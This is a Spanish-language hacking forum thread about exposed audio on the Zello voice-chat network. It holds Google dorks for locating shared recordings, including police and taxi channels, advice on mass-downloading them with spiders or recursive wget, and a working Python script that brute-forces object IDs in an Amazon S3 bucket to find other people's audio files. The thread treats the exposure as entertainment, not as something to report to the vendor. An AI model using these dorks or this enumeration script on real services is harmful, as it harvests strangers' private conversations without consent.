El caso de la red Zello o como intervenir comunicaciones en red social

Iniciado por Rootkit_Pentester, Julio 11, 2018, 05:02:05 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 11, 2018, 05:02:05 AM
Hola gente hoy les voy a hablar de una red social como whatsapp o telegram, pero es por audio o videoconferencia...

Aqui les mando el link de esta red que presume tener 120 millones de usuarios xD. Link project:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Lo que mola con esta red es que es totalmente insegura y uno puede encontrarse con video conferencias y audios de todo tipo, sin mas haciendo "hacking con buscadores" con google.

Dork PoC: site:zello.com/shared

68.000 audios y charlas de todo tipo, pero filtremos...

site:zello.com/shared/ policia

78 resultados entre ellos...


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

O

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

PoC Taxis:

site:zello.com/shared taxy

14000 resultados...

Algunos como:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Espero que se entretengan y sed buenos!.
Saludos Rootkit_Pentester.

"Dame un buscador y movere el mundo".

Julio 11, 2018, 06:10:40 AM #1
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

CitarYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.
Julio 11, 2018, 08:00:00 AM #2
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

CitarYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.

Genial esa critica @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, espero otras xD. Mientras tanto cazo mi burpsuite jeje. Saludos }:)
Julio 11, 2018, 09:20:01 AM #3
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:

CitarYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login<id>.mp3

Con un regex y un spider se podrían descargar conversaciones de forma masiva.

Genial esa critica @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, espero otras xD. Mientras tanto cazo mi burpsuite jeje. Saludos }:)

se puede usar wget de forma recursiva
PGP :: <D82F366940155CB043147178C4E075FC4403BDDC>

~ DtxdF
Julio 11, 2018, 10:44:03 AM #4 Ultima modificación: Julio 11, 2018, 10:47:29 AM por Rootkit_Pentester
Tambien se puede usar wget de forma recursiva, pero...
Tengo una novedad @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Los mp3 no vienen de: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login sino de un bucket de Amazon   ;D

Este es el Bucket xD: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Pueden explotarlo haciendo los 2  tipos de tecnicas que dicen uds o usar bing o You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
tendran 14 audios.

Saludos colegas :D
Julio 11, 2018, 05:17:14 PM #5
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Tambien se puede usar wget de forma recursiva, pero...
Tengo una novedad @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Los mp3 no vienen de: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login sino de un bucket de Amazon   ;D

Este es el Bucket xD: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Pueden explotarlo haciendo los 2  tipos de tecnicas que dicen uds o usar bing o You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
tendran 14 audios.

Saludos colegas :D

Exacto.
Funciona de una manera muy simple:

           You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login<id>

Devuelve un 200 OK si hay archivo de audio, y un 403 Forbidden si no hay archivo.


Los IDs, aparentemente, tienen una longitud de entre 5 y 13 caracteres alfanuméricos en mayúsculas y minúsculas.
Este es un pequeño PoC para encontrar archivos de forma aleatoria con solo 5 caracteres de longitud.
Código: python
import requests
import random

def random_string():

	return "".join([random.choice("qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM") for _ in range(5)])

for x in range(500):

	a = random_string()
	req = requests.get("https://s3.amazonaws.com/zello.sharedmessages/" + a, headers={'User-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0'})
	if req.status_code == 200:

		print a + " existe.           - - - - - - - - - - - - -"

	else:

		print a + " no existe. -> " + str(req.status_code)


Y funciona tal que así.
Julio 11, 2018, 07:00:30 PM #6
Grande capo @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login te felicito por el script, creo que te lo voy a robar para usarlo como fuzzer!.
Saludos! ;).
Imprimir
Ir Arriba Páginas1
Acciones del Usuario